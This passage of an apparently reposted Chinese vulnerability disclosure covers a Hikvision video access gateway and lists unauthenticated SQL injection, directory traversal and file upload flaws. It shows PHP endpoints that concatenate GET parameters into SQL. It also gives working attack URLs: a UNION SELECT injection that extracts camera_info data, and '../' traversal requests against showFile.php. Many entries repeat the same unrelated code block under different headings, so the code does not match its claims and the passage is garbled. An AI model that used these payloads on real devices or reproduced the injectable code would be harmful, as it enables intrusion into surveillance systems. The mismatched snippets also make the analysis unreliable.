$re= $dbQuery->query('select * from menu_info where level=2 and parentMenuId='.$pNodeId);//根据父菜单查询所有子菜单

6

第二十八处:/data/saveRoleInfo.php

code 区域
<?php
include('../common/connDb.php');
$type = $_GET['type'];
$pNodeId = @$_GET['pNodeId'];
$dbQuery = new DataBaseQuery();
if($type=="main"){//取主菜单的树
findAllMainMenuNode($dbQuery);
}else{//取子菜单的树
findAllSubMenuNode($dbQuery,$pNodeId);
}

class TreeNode{
var $id;
var $text;
var $iconCls;
var $state;
var $children=array();
function __construct(){

}
public function setId($id)
{
$this->id = $id;
}
public function setText($text)
{
$this->text = $text;
}
public function setIconCls($iconCls)
{
$this->iconCls = $iconCls;
}
public function setState($state)
{
$this->state = $state;
}
public function setChildren($children)
{
$this->children = $children;
}
public function getId()
{
return $this->id;
}
public function getText()
{
return $this->text;
}
public function getIconCls()
{
return $this->iconCls;
}
public function getState()
{
return $this->state;
}
public function getChildren()
{
return $this->children;
}

}

/**
找出主菜单的树节点
*/
function findAllMainMenuNode($dbQuery){
$jsonArray = array();
$pNode = new TreeNode();
$pNode->setId('0');
$pNode->setText('主菜单');
$pNode->setIconCls('icon-folder');
array_push($jsonArray,$pNode);
$re= $dbQuery->query('select * from menu_info where level=1');//查询所有主菜单
while($row = $dbQuery->fetchArray($re)){
$cNode = new TreeNode();
$cNode->setId($row['menuId']);
$cNode->setText($row['name']);
$cNode->setIconCls('icon-systemMenu');
if ($pNode->getChildren() != null) {
$childrenArray = $pNode->getChildren();
array_push($childrenArray,$cNode);
$pNode->setChildren($childrenArray);
}else{
$childrenNodes = array();
array_push($childrenNodes,$cNode);
$pNode->setChildren($childrenNodes);
}
}
print_r(json_encode($jsonArray));
$dbQuery->closeDb();
}

/**
找出子菜单的树节点
*/
function findAllSubMenuNode($dbQuery,$pNodeId){
$jsonArray = array();
$pNode = new TreeNode();
$pNode->setId('0');
$pNode->setText('子菜单');
$pNode->setIconCls('icon-folder');
array_push($jsonArray,$pNode);
$re= $dbQuery->query('select * from menu_info where level=2 and parentMenuId='.$pNodeId);//根据父菜单查询所有子菜单

7

第二十九处:/data/roleInfoData.php

code 区域
<?php
include('../common/connDb.php');
$type = $_GET['type'];
$pNodeId = @$_GET['pNodeId'];
$dbQuery = new DataBaseQuery();
if($type=="main"){//取主菜单的树
findAllMainMenuNode($dbQuery);
}else{//取子菜单的树
findAllSubMenuNode($dbQuery,$pNodeId);
}

class TreeNode{
var $id;
var $text;
var $iconCls;
var $state;
var $children=array();
function __construct(){

}
public function setId($id)
{
$this->id = $id;
}
public function setText($text)
{
$this->text = $text;
}
public function setIconCls($iconCls)
{
$this->iconCls = $iconCls;
}
public function setState($state)
{
$this->state = $state;
}
public function setChildren($children)
{
$this->children = $children;
}
public function getId()
{
return $this->id;
}
public function getText()
{
return $this->text;
}
public function getIconCls()
{
return $this->iconCls;
}
public function getState()
{
return $this->state;
}
public function getChildren()
{
return $this->children;
}

}

/**
找出主菜单的树节点
*/
function findAllMainMenuNode($dbQuery){
$jsonArray = array();
$pNode = new TreeNode();
$pNode->setId('0');
$pNode->setText('主菜单');
$pNode->setIconCls('icon-folder');
array_push($jsonArray,$pNode);
$re= $dbQuery->query('select * from menu_info where level=1');//查询所有主菜单
while($row = $dbQuery->fetchArray($re)){
$cNode = new TreeNode();
$cNode->setId($row['menuId']);
$cNode->setText($row['name']);
$cNode->setIconCls('icon-systemMenu');
if ($pNode->getChildren() != null) {
$childrenArray = $pNode->getChildren();
array_push($childrenArray,$cNode);
$pNode->setChildren($childrenArray);
}else{
$childrenNodes = array();
array_push($childrenNodes,$cNode);
$pNode->setChildren($childrenNodes);
}
}
print_r(json_encode($jsonArray));
$dbQuery->closeDb();
}

/**
找出子菜单的树节点
*/
function findAllSubMenuNode($dbQuery,$pNodeId){
$jsonArray = array();
$pNode = new TreeNode();
$pNode->setId('0');
$pNode->setText('子菜单');
$pNode->setIconCls('icon-folder');
array_push($jsonArray,$pNode);
$re= $dbQuery->query('select * from menu_info where level=2 and parentMenuId='.$pNodeId);//根据父菜单查询所有子菜单

8

第三十处:/data/shareDeviceInfo.php

code 区域
<?php
include('../common/connDb.php');
$type = $_GET['type'];
$pNodeId = @$_GET['pNodeId'];
$dbQuery = new DataBaseQuery();
if($type=="main"){//取主菜单的树
findAllMainMenuNode($dbQuery);
}else{//取子菜单的树
findAllSubMenuNode($dbQuery,$pNodeId);
}

class TreeNode{
var $id;
var $text;
var $iconCls;
var $state;
var $children=array();
function __construct(){

}
public function setId($id)
{
$this->id = $id;
}
public function setText($text)
{
$this->text = $text;
}
public function setIconCls($iconCls)
{
$this->iconCls = $iconCls;
}
public function setState($state)
{
$this->state = $state;
}
public function setChildren($children)
{
$this->children = $children;
}
public function getId()
{
return $this->id;
}
public function getText()
{
return $this->text;
}
public function getIconCls()
{
return $this->iconCls;
}
public function getState()
{
return $this->state;
}
public function getChildren()
{
return $this->children;
}

}

/**
找出主菜单的树节点
*/
function findAllMainMenuNode($dbQuery){
$jsonArray = array();
$pNode = new TreeNode();
$pNode->setId('0');
$pNode->setText('主菜单');
$pNode->setIconCls('icon-folder');
array_push($jsonArray,$pNode);
$re= $dbQuery->query('select * from menu_info where level=1');//查询所有主菜单
while($row = $dbQuery->fetchArray($re)){
$cNode = new TreeNode();
$cNode->setId($row['menuId']);
$cNode->setText($row['name']);
$cNode->setIconCls('icon-systemMenu');
if ($pNode->getChildren() != null) {
$childrenArray = $pNode->getChildren();
array_push($childrenArray,$cNode);
$pNode->setChildren($childrenArray);
}else{
$childrenNodes = array();
array_push($childrenNodes,$cNode);
$pNode->setChildren($childrenNodes);
}
}
print_r(json_encode($jsonArray));
$dbQuery->closeDb();
}

/**
找出子菜单的树节点
*/
function findAllSubMenuNode($dbQuery,$pNodeId){
$jsonArray = array();
$pNode = new TreeNode();
$pNode->setId('0');
$pNode->setText('子菜单');
$pNode->setIconCls('icon-folder');
array_push($jsonArray,$pNode);
$re= $dbQuery->query('select * from menu_info where level=2 and parentMenuId='.$pNodeId);//根据父菜单查询所有子菜单

9

第三十一处:/data/modifyCameraName.php

code 区域
<?php
include('../common/connDb.php');
include('deviceTypeClass.php');
$deviceId = $_GET['deviceId'];
$dbQuery = new DataBaseQuery();
$re = $dbQuery->query('select type_code,name from device_type_info');
$deviceTypeArray = array(); //获取所有设备类型
while ($row = $dbQuery->fetchArray($re)){
$deviceType = new DeviceType($row['type_code'],$row['name']);
array_push($deviceTypeArray,$deviceType);
}

$re = $dbQuery->query('select id,name from device_group_info');
$groupArray = array();
array_push($groupArray,new DeviceType("0","请选择"));
while ($row = $dbQuery->fetchArray($re)){
$deviceType = new DeviceType($row['id'],$row['name']);
array_push($groupArray,$deviceType);
}

$type_code="";
$network_addr="";
$network_port="";
$username="";
$password="******";
$indexcode="";
$name="";
$serial_num="";
$analog_chan_count="";
$digital_chan_count="";
$alarm_in_count="";
$alarm_out_count="";
$audio_num="";
$reg_type="";
$group_id="";
$allowShare="";
$ctrl_unit_id ="";
$re = $dbQuery->query('select * from device_info where id='.$deviceId);

0

第三十二处:/data/saveDeviceInfo.php

code 区域
<?php
include('../common/connDb.php');
include('deviceTypeClass.php');
$deviceId = $_GET['deviceId'];
$dbQuery = new DataBaseQuery();
$re = $dbQuery->query('select type_code,name from device_type_info');
$deviceTypeArray = array(); //获取所有设备类型
while ($row = $dbQuery->fetchArray($re)){
$deviceType = new DeviceType($row['type_code'],$row['name']);
array_push($deviceTypeArray,$deviceType);
}

$re = $dbQuery->query('select id,name from device_group_info');
$groupArray = array();
array_push($groupArray,new DeviceType("0","请选择"));
while ($row = $dbQuery->fetchArray($re)){
$deviceType = new DeviceType($row['id'],$row['name']);
array_push($groupArray,$deviceType);
}

$type_code="";
$network_addr="";
$network_port="";
$username="";
$password="******";
$indexcode="";
$name="";
$serial_num="";
$analog_chan_count="";
$digital_chan_count="";
$alarm_in_count="";
$alarm_out_count="";
$audio_num="";
$reg_type="";
$group_id="";
$allowShare="";
$ctrl_unit_id ="";
$re = $dbQuery->query('select * from device_info where id='.$deviceId);

1

漏洞证明:

第三十三处:/data/deviceAndCameraListData.php

code 区域
<?php
include('../common/connDb.php');
include('deviceTypeClass.php');
$deviceId = $_GET['deviceId'];
$dbQuery = new DataBaseQuery();
$re = $dbQuery->query('select type_code,name from device_type_info');
$deviceTypeArray = array(); //获取所有设备类型
while ($row = $dbQuery->fetchArray($re)){
$deviceType = new DeviceType($row['type_code'],$row['name']);
array_push($deviceTypeArray,$deviceType);
}

$re = $dbQuery->query('select id,name from device_group_info');
$groupArray = array();
array_push($groupArray,new DeviceType("0","请选择"));
while ($row = $dbQuery->fetchArray($re)){
$deviceType = new DeviceType($row['id'],$row['name']);
array_push($groupArray,$deviceType);
}

$type_code="";
$network_addr="";
$network_port="";
$username="";
$password="******";
$indexcode="";
$name="";
$serial_num="";
$analog_chan_count="";
$digital_chan_count="";
$alarm_in_count="";
$alarm_out_count="";
$audio_num="";
$reg_type="";
$group_id="";
$allowShare="";
$ctrl_unit_id ="";
$re = $dbQuery->query('select * from device_info where id='.$deviceId);

2

第三十四处:/data/groupListData.php

code 区域
<?php
include('../common/connDb.php');
include('deviceTypeClass.php');
$deviceId = $_GET['deviceId'];
$dbQuery = new DataBaseQuery();
$re = $dbQuery->query('select type_code,name from device_type_info');
$deviceTypeArray = array(); //获取所有设备类型
while ($row = $dbQuery->fetchArray($re)){
$deviceType = new DeviceType($row['type_code'],$row['name']);
array_push($deviceTypeArray,$deviceType);
}

$re = $dbQuery->query('select id,name from device_group_info');
$groupArray = array();
array_push($groupArray,new DeviceType("0","请选择"));
while ($row = $dbQuery->fetchArray($re)){
$deviceType = new DeviceType($row['id'],$row['name']);
array_push($groupArray,$deviceType);
}

$type_code="";
$network_addr="";
$network_port="";
$username="";
$password="******";
$indexcode="";
$name="";
$serial_num="";
$analog_chan_count="";
$digital_chan_count="";
$alarm_in_count="";
$alarm_out_count="";
$audio_num="";
$reg_type="";
$group_id="";
$allowShare="";
$ctrl_unit_id ="";
$re = $dbQuery->query('select * from device_info where id='.$deviceId);

3

任意文件生成:/data/deletePlugFiles.php

code 区域
<?php
include('../common/connDb.php');
include('deviceTypeClass.php');
$deviceId = $_GET['deviceId'];
$dbQuery = new DataBaseQuery();
$re = $dbQuery->query('select type_code,name from device_type_info');
$deviceTypeArray = array(); //获取所有设备类型
while ($row = $dbQuery->fetchArray($re)){
$deviceType = new DeviceType($row['type_code'],$row['name']);
array_push($deviceTypeArray,$deviceType);
}

$re = $dbQuery->query('select id,name from device_group_info');
$groupArray = array();
array_push($groupArray,new DeviceType("0","请选择"));
while ($row = $dbQuery->fetchArray($re)){
$deviceType = new DeviceType($row['id'],$row['name']);
array_push($groupArray,$deviceType);
}

$type_code="";
$network_addr="";
$network_port="";
$username="";
$password="******";
$indexcode="";
$name="";
$serial_num="";
$analog_chan_count="";
$digital_chan_count="";
$alarm_in_count="";
$alarm_out_count="";
$audio_num="";
$reg_type="";
$group_id="";
$allowShare="";
$ctrl_unit_id ="";
$re = $dbQuery->query('select * from device_info where id='.$deviceId);

4

任意文件上传:

code 区域
<?php
include('../common/connDb.php');
include('deviceTypeClass.php');
$deviceId = $_GET['deviceId'];
$dbQuery = new DataBaseQuery();
$re = $dbQuery->query('select type_code,name from device_type_info');
$deviceTypeArray = array(); //获取所有设备类型
while ($row = $dbQuery->fetchArray($re)){
$deviceType = new DeviceType($row['type_code'],$row['name']);
array_push($deviceTypeArray,$deviceType);
}

$re = $dbQuery->query('select id,name from device_group_info');
$groupArray = array();
array_push($groupArray,new DeviceType("0","请选择"));
while ($row = $dbQuery->fetchArray($re)){
$deviceType = new DeviceType($row['id'],$row['name']);
array_push($groupArray,$deviceType);
}

$type_code="";
$network_addr="";
$network_port="";
$username="";
$password="******";
$indexcode="";
$name="";
$serial_num="";
$analog_chan_count="";
$digital_chan_count="";
$alarm_in_count="";
$alarm_out_count="";
$audio_num="";
$reg_type="";
$group_id="";
$allowShare="";
$ctrl_unit_id ="";
$re = $dbQuery->query('select * from device_info where id='.$deviceId);

5

任意目录遍历:/remoteUpdate/showFile.php

code 区域
<?php
include('../common/connDb.php');
include('deviceTypeClass.php');
$deviceId = $_GET['deviceId'];
$dbQuery = new DataBaseQuery();
$re = $dbQuery->query('select type_code,name from device_type_info');
$deviceTypeArray = array(); //获取所有设备类型
while ($row = $dbQuery->fetchArray($re)){
$deviceType = new DeviceType($row['type_code'],$row['name']);
array_push($deviceTypeArray,$deviceType);
}

$re = $dbQuery->query('select id,name from device_group_info');
$groupArray = array();
array_push($groupArray,new DeviceType("0","请选择"));
while ($row = $dbQuery->fetchArray($re)){
$deviceType = new DeviceType($row['id'],$row['name']);
array_push($groupArray,$deviceType);
}

$type_code="";
$network_addr="";
$network_port="";
$username="";
$password="******";
$indexcode="";
$name="";
$serial_num="";
$analog_chan_count="";
$digital_chan_count="";
$alarm_in_count="";
$alarm_out_count="";
$audio_num="";
$reg_type="";
$group_id="";
$allowShare="";
$ctrl_unit_id ="";
$re = $dbQuery->query('select * from device_info where id='.$deviceId);

6

任意文件遍历:/serverLog/showFile.php

code 区域
<?php
include('../common/connDb.php');
include('deviceTypeClass.php');
$deviceId = $_GET['deviceId'];
$dbQuery = new DataBaseQuery();
$re = $dbQuery->query('select type_code,name from device_type_info');
$deviceTypeArray = array(); //获取所有设备类型
while ($row = $dbQuery->fetchArray($re)){
$deviceType = new DeviceType($row['type_code'],$row['name']);
array_push($deviceTypeArray,$deviceType);
}

$re = $dbQuery->query('select id,name from device_group_info');
$groupArray = array();
array_push($groupArray,new DeviceType("0","请选择"));
while ($row = $dbQuery->fetchArray($re)){
$deviceType = new DeviceType($row['id'],$row['name']);
array_push($groupArray,$deviceType);
}

$type_code="";
$network_addr="";
$network_port="";
$username="";
$password="******";
$indexcode="";
$name="";
$serial_num="";
$analog_chan_count="";
$digital_chan_count="";
$alarm_in_count="";
$alarm_out_count="";
$audio_num="";
$reg_type="";
$group_id="";
$allowShare="";
$ctrl_unit_id ="";
$re = $dbQuery->query('select * from device_info where id='.$deviceId);

7

任意文件遍历:

**.**.**.**:7288/serverLog/showFile.php?fileName=../web/html/serverLog/showFile.php

漏洞标题:  海康威视某视频接入网关系统漏洞集合(无需登录34处SQL注入&amp;文件遍历&amp;上传等)

随便手工验证一处注入:

**.**.**.**:7288/transformServer/serverConfigInfo.php?transId=1 union select 1,2,3,(select GROUP_CONCAT(1,2) from camera_info),5,6,7,8,9,10,11,12,13,14–

漏洞标题:  海康威视某视频接入网关系统漏洞集合(无需登录34处SQL注入&amp;文件遍历&amp;上传等)

目录遍历:

**.**.**.**:7288/remoteUpdate/showFile.php?fileName=../../../

漏洞标题:  海康威视某视频接入网关系统漏洞集合(无需登录34处SQL注入&amp;文件遍历&amp;上传等)

案例:

code 区域
<?php
include('../common/connDb.php');
include('deviceTypeClass.php');
$deviceId = $_GET['deviceId'];
$dbQuery = new DataBaseQuery();
$re = $dbQuery->query('select type_code,name from device_type_info');
$deviceTypeArray = array(); //获取所有设备类型
while ($row = $dbQuery->fetchArray($re)){
$deviceType = new DeviceType($row['type_code'],$row['name']);
array_push($deviceTypeArray,$deviceType);
}

$re = $dbQuery->query('select id,name from device_group_info');
$groupArray = array();
array_push($groupArray,new DeviceType("0","请选择"));
while ($row = $dbQuery->fetchArray($re)){
$deviceType = new DeviceType($row['id'],$row['name']);
array_push($groupArray,$deviceType);
}

$type_code="";
$network_addr="";
$network_port="";
$username="";
$password="******";
$indexcode="";
$name="";
$serial_num="";
$analog_chan_count="";
$digital_chan_count="";
$alarm_in_count="";
$alarm_out_count="";
$audio_num="";
$reg_type="";
$group_id="";
$allowShare="";
$ctrl_unit_id ="";
$re = $dbQuery->query('select * from device_info where id='.$deviceId);

8

修复方案:

你们懂的。

版权声明:转载请注明来源 YY-2012@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 海康威视某视频接入网关系统漏洞集合(无需登录34处SQL注入&文件遍历&上传等)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址